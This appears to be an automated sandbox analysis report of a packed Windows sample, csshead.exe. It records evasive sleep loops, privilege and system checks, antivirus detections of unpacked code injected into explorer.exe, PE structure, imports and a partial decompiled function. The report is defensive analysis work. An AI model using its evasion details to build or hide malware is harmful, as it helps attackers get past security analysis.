Source: C:\Windows\explorer.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_1-4754

Found evasive API chain (may stop execution after accessing registry keys)

Show sources

Source: C:\Windows\explorer.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

graph_1-4677

Found evasive API chain (may stop execution after checking a module file name)

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-18809

Found evasive API chain checking for process token information

Show sources

Source: C:\Users\user\Desktop\csshead.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_0-19037
Source: C:\Windows\explorer.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_1-4564

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\explorer.exe TID: 3852	Thread sleep count: 75 > 30			Jump to behavior
Source: C:\Windows\explorer.exe TID: 3852	Thread sleep time: -75000s >= -60000s			Jump to behavior

Program does not show much activity (idle)

Show sources

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Sample execution stops while process was sleeping (likely an evasion)

Show sources

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00403988 FindFirstFileA,FindClose,	0_2_00403988
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00405640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405640
Source: C:\Windows\explorer.exe	Code function: 1_2_00775640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,	1_2_00775640
Source: C:\Windows\explorer.exe	Code function: 1_2_00773988 FindFirstFileA,FindClose,	1_2_00773988

Contains functionality to query system information

Show sources

Source: C:\Users\user\Desktop\csshead.exe

0_2_00419D20

Program exit points

Show sources

Source: C:\Users\user\Desktop\csshead.exe	API call chain: ExitProcess graph end node	graph_0-18811
Source: C:\Users\user\Desktop\csshead.exe	API call chain: ExitProcess graph end node	graph_0-20649
Source: C:\Windows\explorer.exe	API call chain: ExitProcess graph end node	graph_1-5197
Source: C:\Windows\explorer.exe	API call chain: ExitProcess graph end node	graph_1-5140
Source: C:\Windows\explorer.exe	API call chain: ExitProcess graph end node	graph_1-5566

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_00420B80 GetWindowLongA,GetWindowLongA,IsWindowVisible,IsIconic,ShowWindow,GetWindowLongA,GetParent,

0_2_00420B80

Lowering of HIPS / PFW / Operating System Security Settings:

May initialize a security null descriptor

Show sources

Source: csshead.exe

Binary or memory string: S:(ML;;NRNWNX;;;LW)

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_00406C6C cpuid

0_2_00406C6C

Queries device information via Setup API

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_00406EEC LoadLibraryA,SetupDiGetClassDevsA,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyA,CharLowerBuffA,SetupDiDestroyDeviceInfoList,SetupDiGetClassDevsA,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyA,CharLowerBuffA,SetupDiDestroyDeviceInfoList,

0_2_00406EEC

Queries the installation date of Windows

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the product ID of Windows

Show sources

Source: C:\Windows\explorer.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Windows\explorer.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Windows\explorer.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Windows\explorer.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior

Contains functionality to query local / system time

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_00405468 GetSystemTime,

0_2_00405468

Contains functionality to query the account / user name

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_0041C95B LoadLibraryA,LoadLibraryA,CreateEventA,GetClassLongA,SetClassLongA,GetCursorPos,GetCursorPos,WaitForSingleObject,WaitNamedPipeA,CreateFileA,SetNamedPipeHandleState,WriteFile,ReadFile,LookupAccountNameA,LocalFree,SetAbortProc,DrawFrameControl,LoadImageA,CreateEventA,GetCursorPos,GetCursorPos,DragQueryFile,CreateRectRgnIndirect,WaitForSingleObject,EnableMenuItem,GetDlgItem,OleInitialize,RegisterDragDrop,GetTopWindow,RevokeDragDrop,OleUninitialize,SetMenuItemInfoA,GetLastError,DrawMenuBar,GetMenuItemInfoA,BeginPaint,EndPaint,GetClientRect,EnumDateFormatsA,Sleep,

0_2_0041C95B

Contains functionality to query windows version

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_004064BC GetVersionExA,

0_2_004064BC

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious

Simulations

Behavior and APIs

Time	Type	Description
15:35:03	API Interceptor	3x Sleep call for process: csshead.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label
0.2.csshead.exe.50000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen
0.2.csshead.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1023574
0.0.csshead.exe.400000.0.unpack	100%	Avira	TR/Patched.Gen
1.2.explorer.exe.790000.2.unpack	100%	Avira	TR/Patched.Ren.Gen
1.2.explorer.exe.770000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen
0.1.csshead.exe.400000.0.unpack	100%	Avira	TR/Patched.Gen

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshots

Startup

System is w10native

csshead.exe (PID: 2236 cmdline: 'C:\Users\user\Desktop\csshead.exe' MD5: 9E3EA995E40B62ADAE78E93E6B30780C)

explorer.exe (PID: 972 cmdline: C:\Windows\explorer.exe MD5: FCBCED2A237DCD7EF86CED551B731742)

cleanup

Created / dropped Files

No created / dropped files found

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.472920800285694
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	csshead.exe
File size:	321024
MD5:	9e3ea995e40b62adae78e93e6b30780c
SHA1:	35b1fdd71e01d72e4bd49d4c301ccd6b2a9ac0a3
SHA256:	e3785b4cc4c314854e7ef225bc76a1853b0d1603016bbe5b5ffcc792e4b36972
SHA512:	cc2d1fdab7a19dac3a338290790489a531d949057412e1807c067edb9c3d4a45005e6c74bae76226b47aa173726fbbbd5abbe3d0cd525027a1d42a8be6eadf26
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*I.dn(.7n(.7n(.7.^?7k(.7u..7J(.7gP.7i(.7gP.7I(.7n(.7.).7u.>7.(.7u.?7/(.7u..7o(.7u..7o(.7Richn(.7........PE..L...F.9[...........

File Icon

Static PE Info

General
Entrypoint:	0x424d6e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5B392E46 [Sun Jul 1 19:40:54 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	77535e666d5a37b2da29fe59caf3bb3c

Entrypoint Preview

Instruction
call 00007FE325815C94h
jmp 00007FE32580D7CEh
push 0000000Ch
push 0043CD98h
call 00007FE325812AB1h
push 0000000Eh
call 00007FE325814C45h
pop ecx
and dword ptr [ebp-04h], 00000000h
mov esi, dword ptr [ebp+08h]
mov ecx, dword ptr [esi+04h]
test ecx, ecx
je 00007FE32580D971h
mov eax, dword ptr [00442C44h]
mov edx, 00442C40h
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007FE32580D953h
cmp dword ptr [eax], ecx
jne 00007FE32580D96Eh
mov ecx, dword ptr [eax+04h]
mov dword ptr [edx+04h], ecx
push eax
call 00007FE32580B38Eh
pop ecx
push dword ptr [esi+04h]
call 00007FE32580B385h
pop ecx
and dword ptr [esi+04h], 00000000h
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007FE32580D94Fh
call 00007FE325812AA0h
ret
mov edx, eax
jmp 00007FE32580D907h
push 0000000Eh
call 00007FE325814B11h
pop ecx
ret
int3
int3
int3
int3
int3
int3
int3
int3
mov edx, dword ptr [esp+04h]
mov ecx, dword ptr [esp+08h]
test edx, 00000003h
jne 00007FE32580D97Eh
mov eax, dword ptr [edx]
cmp al, byte ptr [ecx]
jne 00007FE32580D970h
or al, al
je 00007FE32580D968h
cmp ah, byte ptr [ecx+01h]
jne 00007FE32580D967h
or ah, ah
je 00007FE32580D95Fh
shr eax, 10h
cmp al, byte ptr [ecx+02h]
jne 00007FE32580D95Bh
or al, al
je 00007FE32580D953h
cmp ah, byte ptr [ecx+03h]
jne 00007FE32580D952h
add ecx, 04h
add edx, 04h
or ah, ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d278	0x190	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x45000	0x8964	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3a518	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31edc	0x32000	False	0.537592773438	data	6.55027699615	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xc348	0xc400	False	0.43775908801	data	5.53658582571	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x40000	0x4aac	0x2c00	False	0.263227982955	data	4.45525333861	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x45000	0x8964	0x8a00	False	0.948907382246	data	7.86989360139	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4e000	0x4642	0x4800	False	0.00222439236111	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RCDATA	0x451e8	0x3e6b	data	English	United States
RCDATA	0x49054	0x4080	data	English	United States
RT_ICON	0x4d0d4	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x4d1fc	0x2e8	data	English	United States
RT_GROUP_ICON	0x4d4e4	0x22	MS Windows icon resource - 2 icons, 16x16, 16-colors	English	United States
RT_VERSION	0x4d508	0x300	data	English	United States
RT_MANIFEST	0x4d808	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.DLL	CreateThread, GetSystemInfo, GetCommandLineA, LockResource, lstrcatA, GetSystemTimeAsFileTime, SetConsoleCtrlHandler, CreateFileA, CreateFileW, FlushFileBuffers, WriteConsoleW, SetStdHandle, GetConsoleMode, GetConsoleCP, SetFilePointer, GetTickCount, QueryPerformanceCounter, GetFileType, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, LoadLibraryW, HeapCreate, CreateIoCompletionPort, GetModuleFileNameW, GetStdHandle, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, HeapSize, HeapReAlloc, TerminateProcess, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, HeapSetInformation, ExitProcess, RtlUnwind, ExitThread, VirtualQuery, VirtualProtect, EncodePointer, DecodePointer, InterlockedPopEntrySList, VirtualFree, IsProcessorFeaturePresent, HeapAlloc, GetProcessHeap, HeapFree, InterlockedPushEntrySList, InterlockedCompareExchange, VirtualAlloc, WaitNamedPipeA, SetNamedPipeHandleState, WriteFile, ReadFile, LocalAlloc, LocalFree, EnumDateFormatsA, Sleep, GetCurrentProcessId, LoadLibraryExA, FindResourceA, LoadResource, SizeofResource, FreeLibrary, GlobalAlloc, GlobalLock, GlobalUnlock, MulDiv, lstrcmpA, SetEvent, IsDBCSLeadByte, GetModuleHandleW, GetModuleFileNameA, CreateEventA, LoadLibraryA, WaitForSingleObject, CloseHandle, GetVersionExA, lstrcmpiA, GetModuleHandleA, GetProcAddress, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetLastError, lstrlenW, WideCharToMultiByte, DeleteFileA, OutputDebugStringA, DebugBreak, InterlockedIncrement, GetFileAttributesA, GetFullPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, lstrcpyA, lstrcpynA, lstrlenA, InterlockedDecrement, MultiByteToWideChar, SetLastError, GetCurrentThreadId, GetCurrentProcess, FlushInstructionCache, LeaveCriticalSection, EnterCriticalSection, GetStringTypeW, RaiseException
ADVAPI32.dll	RegDeleteKeyA, RegCreateKeyExA, RegOpenKeyExA, RegCloseKey, RegSetValueExA, RegQueryInfoKeyW, RegEnumKeyExA, RegQueryInfoKeyA, LookupAccountNameA, RegDeleteValueA
COMCTL32.dll	InitCommonControlsEx, ImageList_Destroy, ImageList_GetImageCount, ImageList_Draw, ImageList_DrawIndirect, ImageList_Create, ImageList_LoadImageA, ImageList_AddMasked
COMDLG32.dll	CommDlgExtendedError, GetOpenFileNameA, GetSaveFileNameA, GetFileTitleA
dxva2.dll	GetNumberOfPhysicalMonitorsFromHMONITOR
GDI32.dll	GetCurrentObject, CreateRectRgnIndirect, CreateDIBSection, CreatePatternBrush, CreateBitmap, PatBlt, SetBkColor, SetBrushOrgEx, SetTextColor, SetBkMode, GetViewportOrgEx, CreateFontIndirectA, SetViewportOrgEx, GetStockObject, GetObjectA, CreateSolidBrush, GetDeviceCaps, StartDocA, StartPage, TextOutA, EndPage, EndDoc, CreateMetaFileA, GetDIBits, CreatePen, Polyline, SetStretchBltMode, CreateCompatibleDC, BitBlt, DeleteObject, SetAbortProc, SelectObject, DeleteDC, CreateCompatibleBitmap
gdiplus.dll	GdipDisposeImage, GdipGetImageRawFormat, GdipLoadImageFromFile, GdipAlloc, GdipCloneImage, GdiplusShutdown, GdiplusStartup, GdipFree
mscms.dll	OpenColorProfileA
NETAPI32.dll	NetShareGetInfo
ODBC32.dll
ole32.dll	CoInitialize, CoUninitialize, CoLockObjectExternal, RegisterDragDrop, RevokeDragDrop, CoResumeClassObjects, OleUninitialize, OleInitialize, CLSIDFromString, CLSIDFromProgID, CoGetClassObject, OleLockRunning, StringFromGUID2, CreateStreamOnHGlobal, GetHGlobalFromStream, CoTaskMemFree, CoRegisterClassObject, CoRevokeClassObject, CoTaskMemRealloc, CoTaskMemAlloc, CoCreateInstance, CoInitializeEx
OLEAUT32.dll	LoadTypeLib, UnRegisterTypeLib, RegisterTypeLib, VarUI4FromStr, SysAllocString, VariantClear, OleCreateFontIndirect, LoadRegTypeLib, OleCreatePictureIndirect, SysAllocStringLen, SysStringLen, VariantInit, SysFreeString
pdh.dll	PdhGetFormattedCounterValue
SHELL32.dll	DragQueryFileA, SHGetFileInfoA
SHLWAPI.dll	PathFindFileNameA, PathStripToRootA, PathIsUNCA, PathFindExtensionA
USER32.dll	CreateMenu, LoadBitmapA, BeginDeferWindowPos, GetIconInfo, SetWindowContextHelpId, GetDlgItemTextA, CopyImage, SetClassLongA, GetCursorPos, EnableMenuItem, DrawMenuBar, GetMenuStringA, CheckMenuRadioItem, RemoveMenu, AppendMenuA, CreatePopupMenu, DefFrameProcA, LoadStringW, PostQuitMessage, SetMenuDefaultItem, GetWindowTextLengthA, GetWindowTextA, GetWindowLongA, GetParent, SetWindowTextA, GetSubMenu, SetWindowsHookExA, CallNextHookEx, GetSysColorBrush, GetKeyState, CharLowerA, UnhookWindowsHookEx, InflateRect, SystemParametersInfoA, SetRectEmpty, IsMenu, GetWindowDC, TrackPopupMenuEx, TrackPopupMenu, GetMenu, SetMenu, TranslateMDISysAccel, DialogBoxParamA, SetWindowPos, UnregisterClassA, MapWindowPoints, GetClientRect, GetMonitorInfoA, MonitorFromWindow, GetWindowRect, GetWindow, EndDialog, SetWindowLongA, GetClassInfoExA, LoadCursorA, TranslateAcceleratorA, RegisterClassExA, CreateWindowExA, SendMessageA, GetTopWindow, CharUpperA, LoadStringA, SetCursor, CharNextA, MessageBoxA, GetActiveWindow, WindowFromPoint, MessageBeep, GetSystemMenu, GetCapture, PtInRect, FrameRect, ModifyMenuA, DrawEdge, MonitorFromPoint, DrawFrameControl, DrawTextA, OffsetRect, SetRect, GetClassLongA, GetMenuDefaultItem, SetMenuItemInfoA, IsIconic, AdjustWindowRectEx, DefMDIChildProcA, GetMessagePos, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, DrawIconEx, GetWindowThreadProcessId, IsWindowEnabled, IsWindowVisible, UpdateWindow, PostMessageA, LoadMenuA, LoadAcceleratorsA, RegisterWindowMessageA, CharNextW, DestroyMenu, CreateAcceleratorTableA, PostThreadMessageA, ShowWindow, IsWindow, LoadIconA, DefWindowProcA, DispatchMessageA, TranslateMessage, GetMessageA, PeekMessageA, BringWindowToTop, GetLastActivePopup, DestroyWindow, LoadImageA, GetSystemMetrics, GetSysColor, MoveWindow, ClientToScreen, ScreenToClient, GetDC, GetDesktopWindow, SetFocus, GetFocus, DestroyAcceleratorTable, BeginPaint, EndPaint, CallWindowProcA, FillRect, ReleaseCapture, GetClassNameA, GetDlgItem, IsChild, SetCapture, RedrawWindow, InvalidateRgn, InvalidateRect, ReleaseDC, wsprintfA
WININET.dll	FtpPutFileEx
WINMM.dll	mmioSetInfo, mmioAscend
WINSPOOL.DRV	EnumPrintersA

Version Infos

Description	Data
LegalCopyright	Copyright (C) 2018
InternalName	template.exe
FileVersion	1.0.0.1
CompanyName	TODO: <Company name>
ProductName	TODO: <Product name>
ProductVersion	1.0.0.1
FileDescription	TODO: <File description>
OriginalFilename	template.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: csshead.exe PID: 2236 Parent PID: 3740

General

Start time:	15:34:40
Start date:	03/07/2018
Path:	C:\Users\user\Desktop\csshead.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\csshead.exe'
Imagebase:	0x400000
File size:	321024 bytes
MD5 hash:	9E3EA995E40B62ADAE78E93E6B30780C
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 972 Parent PID: 2236

General

Start time:	15:35:23
Start date:	03/07/2018
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x1230000
File size:	4064320 bytes
MD5 hash:	FCBCED2A237DCD7EF86CED551B731742
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: csshead.exe PID: 2236 Parent PID: 3740

Execution Graph

Execution Coverage:	13.8%
Dynamic/Decrypted Code Coverage:	0.7%
Signature Coverage:	18.9%
Total number of Nodes:	1918
Total number of Limit Nodes:	50

Executed Functions

Function 0041C95B, Relevance: 193.8, APIs: 88, Strings: 22, Instructions: 1340
windowcomstringCrypto

C-Code - Quality: 58%

			E0041C95B(void* __eax, void* __edi, void* __eflags, signed long long __fp0) {
				void* _t469;
				void* _t481;
				struct HINSTANCE__* _t482;
				struct HICON__* _t483;
				struct HINSTANCE__* _t489;
				struct HICON__* _t490;
				signed short _t496;
				void* _t498;
				signed int _t506;
				signed int _t512;
				CHAR* _t523;
				int _t525;
				int _t539;
				void* _t540;
				int _t541;
				int _t542;
				int _t544;
				long _t548;
				void* _t554;
				signed char _t556;
				void* _t580;
				struct tagPOINT _t594;
				CHAR* _t601;
				void* _t614;
				long _t616;
				void* _t620;
				CHAR* _t622;
				CHAR* _t625;
				CHAR* _t628;
				CHAR* _t629;
				CHAR* _t635;
				struct _SECURITY_ATTRIBUTES* _t636;
				CHAR* _t638;
				struct _SECURITY_ATTRIBUTES* _t639;
				CHAR* _t641;
				CHAR* _t643;
				intOrPtr* _t644;
				long _t646;
				struct _SECURITY_ATTRIBUTES* _t648;
				int _t651;
				struct HWND__* _t652;
				struct _SECURITY_ATTRIBUTES* _t661;
				CHAR* _t662;
				CHAR* _t663;
				CHAR* _t664;
				CHAR* _t668;
				struct _SECURITY_ATTRIBUTES* _t669;
				CHAR* _t671;
				struct _SECURITY_ATTRIBUTES* _t672;
				intOrPtr* _t674;
				CHAR* _t675;
				intOrPtr* _t676;
				long _t678;
				intOrPtr* _t681;
				struct _SECURITY_ATTRIBUTES* _t683;
				struct _SECURITY_ATTRIBUTES* _t686;
				signed char _t702;
				signed int _t738;
				CHAR* _t763;
				intOrPtr* _t768;
				intOrPtr* _t773;
				intOrPtr _t776;
				intOrPtr _t779;
				void* _t780;
				intOrPtr* _t781;
				CHAR* _t782;
				intOrPtr _t785;
				struct HINSTANCE__* _t786;
				signed int _t787;
				CHAR* _t788;
				struct tagPOINT _t790;
				struct HMENU__* _t791;
				signed short _t810;
				CHAR* _t824;
				signed int _t837;
				CHAR* _t853;
				CHAR* _t859;
				struct _SECURITY_ATTRIBUTES* _t861;
				signed char _t902;
				signed int _t904;
				CHAR* _t905;
				CHAR* _t909;
				CHAR* _t910;
				short _t934;
				struct HWND__* _t945;
				CHAR* _t954;
				CHAR* _t971;
				signed int _t1037;
				intOrPtr _t1039;
				intOrPtr _t1040;
				struct HDC__* _t1041;
				intOrPtr* _t1042;
				signed int _t1043;
				long _t1044;
				signed int _t1045;
				int _t1046;
				intOrPtr* _t1049;
				void* _t1051;
				intOrPtr _t1054;
				intOrPtr _t1055;
				intOrPtr _t1057;
				signed int _t1058;
				void* _t1059;
				void* _t1060;
				void* _t1062;
				intOrPtr _t1063;
				signed short _t1064;
				CHAR* _t1065;
				struct HWND__* _t1067;
				CHAR* _t1068;
				void* _t1069;
				intOrPtr* _t1071;
				CHAR* _t1072;
				intOrPtr _t1075;
				void* _t1076;
				intOrPtr* _t1081;
				struct HWND__* _t1084;
				signed short _t1087;
				struct _SECURITY_ATTRIBUTES* _t1092;
				intOrPtr* _t1096;
				void* _t1097;
				void* _t1098;
				void* _t1099;
				void* _t1100;
				void* _t1101;
				void* _t1102;
				intOrPtr* _t1103;
				void* _t1104;
				void* _t1105;
				int _t1112;
				CHAR* _t1122;
				signed short _t1158;
				signed long long _t1181;

				_t1181 = __fp0;
				_t1036 = __edi;
				_t928 =  *(_t1097 + 0xa0) & 0x0000ffff;
				_t780 = __eax - ( *(_t1097 + 0xa0) & 0x0000ffff);
				_push(_t1097 + 0x1c);
				_push(_t1097 + 0x14);
				_push(0);
				_push(0);
				_push(2);
				_push(0);
				_push(2); // executed
				L00421DD8(); // executed
				_t1054 =  *((intOrPtr*)(_t1097 + 0x10));
				_t469 = E00422A18(_t928, __edi, _t1054, _t1054);
				_t1098 = _t1097 + 4;
				_push(_t1098 + 0x20);
				_push(_t1098 + 0x20);
				_push(_t1054);
				_push(_t469);
				_push(2);
				_push(0);
				_push(2); // executed
				L00421DD8(); // executed
				if(_t469 != 0) {
					_t779 =  *((intOrPtr*)(_t1098 + 0x20));
					if(_t779 != 0) {
						 *0x442a94 =  *0x442a94 + _t779;
					}
				}
				if(_t780 == 0) {
					 *0x442a98 =  *0x442a98 + ( *(_t1098 + 0x14) & 0x0000ffff) - ( *0x442a94 & 0x0000ffff) + ( *0x442a94 & 0x0000ffff);
					_t1112 =  *0x442a98;
				}
				L0042240E(_t1036, _t1054, _t1112); // executed
				L0042240E(_t1036, _t1054, _t1112,  ~(0 | _t1112 > 0x00000000) | 0x3200,  ~(0 | _t1112 > 0x00000000) | 0x3200); // executed
				L0042240E(_t1036, _t1054, _t1112);
				L0042240E(_t1036, _t1054, _t1112, 0x12c0, 0x12c0); // executed
				_t1099 = _t1098 + 0x10;
				_push(3);
				_push(1);
				_push(1);
				_push(_t1099 + 0x30);
				 *(_t1099 + 0x34) = 1;
				 *((intOrPtr*)(_t1099 + 0x38)) = "Profile";
				 *(_t1099 + 0x3c) = 8;
				L00432D0E(); // executed
				_push(3);
				_push(1);
				_push(1);
				_push(_t1099 + 0x30);
				 *((intOrPtr*)(_t1099 + 0x38)) = 0x43583c;
				 *(_t1099 + 0x3c) = 5;
				L00432D0E();
				_t934 =  *0x442aa0; // 0x0
				 *((short*)(_t1099 + 0x1b0)) = _t934;
				E00422840(_t1099 + 0x1aa, 0, 0x1fe);
				_t1100 = _t1099 + 0xc;
				_push(_t1100 + 0x1c);
				_push(_t1100 + 0x14);
				_push(0);
				_push(0);
				_push(2);
				_push(0);
				_push(2); // executed
				L00421DD8(); // executed
				_t1055 =  *((intOrPtr*)(_t1100 + 0x10));
				_t481 = E00422A18(_t1100 + 0x14, _t1036, _t1055, _t1055); // executed
				_t1101 = _t1100 + 4;
				_push(_t1101 + 0x20);
				_push(_t1101 + 0x20);
				_push(_t1055);
				_push(_t481);
				_push(2);
				_push(0);
				_push(2); // executed
				L00421DD8(); // executed
				if(_t481 != 0) {
					_t776 =  *((intOrPtr*)(_t1101 + 0x20));
					if(_t776 != 0) {
						 *0x442a94 =  *0x442a94 + _t776;
					}
				}
				_t482 = LoadLibraryA("open"); // executed
				_t483 = LoadIconA(_t482, 0x64);
				_t781 =  *0x433300;
				 *(_t1101 + 0x40) = _t483;
				 *((intOrPtr*)(_t1101 + 0x48)) = 0x14;
				 *(_t1101 + 0x4c) = 3;
				 *_t781(_t1101 + 0x44, _t1101 + 0x5c, 1, _t1101 + 0x10);
				 *_t1081(0, 1, _t1101 + 0x18);
				if( *0x442aa8 != 0) {
					_t773 =  *((intOrPtr*)(_t1101 + 0x10));
					 *((intOrPtr*)( *((intOrPtr*)( *_t773 + 0x3c))))(_t773,  *((intOrPtr*)(_t1101 + 0x1c)), 1, _t1101 + 0x70);
				}
				 *0x4335ec( *((intOrPtr*)(_t1101 + 0x18)), _t1101 + 0x7c);
				if( *(_t1101 + 0x14) == 0) {
					 *0x442a98 =  *0x442a98 + ( *(_t1101 + 0x14) & 0x0000ffff) - ( *0x442a94 & 0x0000ffff) + ( *0x442a94 & 0x0000ffff);
				}
				_t489 = LoadLibraryA("open"); // executed
				_t490 = LoadIconA(_t489, 0x64);
				 *(_t1101 + 0x44) = _t490;
				 *((intOrPtr*)(_t1101 + 0x48)) = 0x14;
				 *(_t1101 + 0x4c) = 3;
				 *_t781(_t1101 + 0x44, _t1101 + 0x5c, 1, _t1101 + 0x10);
				 *_t1081(0, 1, _t1101 + 0x18);
				if( *0x442aa8 != 0) {
					_t768 =  *((intOrPtr*)(_t1101 + 0x10));
					 *((intOrPtr*)( *((intOrPtr*)( *_t768 + 0x3c))))(_t768,  *((intOrPtr*)(_t1101 + 0x1c)), 1, _t1101 + 0x70);
				}
				 *0x4335ec( *((intOrPtr*)(_t1101 + 0x18)), _t1101 + 0x7c);
				_t810 =  *0x442a94; // 0x0
				if( *(_t1101 + 0x14) == 0) {
